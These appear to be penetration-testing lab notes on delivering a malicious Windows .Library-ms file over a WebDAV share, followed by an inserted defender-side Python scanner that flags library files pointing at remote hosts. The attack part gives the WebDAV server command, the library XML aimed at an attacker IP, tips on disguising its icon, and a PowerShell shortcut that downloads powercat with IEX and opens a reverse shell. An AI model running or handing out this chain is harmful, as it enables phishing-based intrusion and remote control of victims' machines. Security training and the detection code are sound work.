Windows Library Files
Windows Library Files are virtual containers used to connect users with data located in remote locations like web services or SMB shares.
Windows Library Files have a .Library-ms extension and are executed by double-clicking them.
WebDAV
To deliver our malicious Windows Library file to the victim, we will create a WebDAV share to host the staged payload.
Start WebDAV Server
┌──(env)─(kali㉿kali)-[~/web]
└─$ /home/kali/env/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/web/

Create Windows Library File
We will create a new file on our Windows host and name it "dog.Library-ms".
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.119.5</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
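
A defender-side check for the library file format shown above, added here as an example and not part of the original notes: it parses .library-ms files and reports every simpleLocation whose url points at an HTTP(S)/WebDAV or UNC target instead of a local folder. The function names, the sample documents and the 192.0.2.10 address are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample with the same structure as the library file above;
# 192.0.2.10 is a documentation-range address, not one taken from this page.
SAMPLE_REMOTE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>http://192.0.2.10</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""
# Constructed benign counterpart that points at a local known folder.
SAMPLE_LOCAL = SAMPLE_REMOTE.replace(
    "http://192.0.2.10", "knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}")

def classify_location(url):
    """Return 'unc', 'webdav' or 'local' for a <url> value."""
    url = url.strip().lower()
    if url.startswith("\\\\"):
        return "unc"
    return "webdav" if url.startswith(("http://", "https://")) else "local"

def remote_locations(xml_data):
    """List (kind, url) for each non-local <simpleLocation> in a library file."""
    data = xml_data.encode("utf-8") if isinstance(xml_data, str) else xml_data
    if b"<!DOCTYPE" in data:  # library files need no DTD; refuse to parse one
        raise ValueError("unexpected DOCTYPE in library file")
    root = ET.fromstring(data)
    urls = (u.text or "" for u in root.iterfind(".//lib:simpleLocation/lib:url", NS))
    return [(classify_location(u), u.strip()) for u in urls
            if classify_location(u) != "local"]

def scan_tree(top):
    """Map each *.library-ms path under `top` to its remote locations."""
    hits = {}
    for path in Path(top).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".library-ms":
            try:
                found = remote_locations(path.read_bytes())
            except (ET.ParseError, ValueError):
                found = [("unparsable", "")]  # surface it for manual review
            if found:
                hits[str(path)] = found
    return hits
```

Running `scan_tree` over download folders, mail attachment stores or user profiles gives a list of library files that reach out to a remote host when opened.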

Right now the icon is a little suspicious, let's change it to something else, like a photo.
Customizing Library File
Change Icon
<iconReference>imageres.dll, -1003</iconReference>

Testing & Fixing Serialization
We can test whether it's working by double-clicking our "dog" icon on the desktop.

Re-open Visual Studio Code
If we re-open "dog" in Visual Studio Code, we can see that its contents have been changed. This happens because Windows tries to optimize the WebDAV communication with the client. So before we ship it off to the victim, we have to make sure that we've fixed it and NOT OPENED it on our end.

Delete the serialized tag and fix the url tag with:
<url>http://192.168.119.2</url>
Create Shortcut
We will create a shortcut on the Desktop. This shortcut will download powercat and open a reverse shell. Right-click the Desktop, select New > Shortcut, and add the following:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.5:8000/powercat.ps1'); powercat -c 192.168.119.5 -p 4444 -e powershell"
Start Web Server
We will start a Python web server to serve the powercat script.
kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~/beyond$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...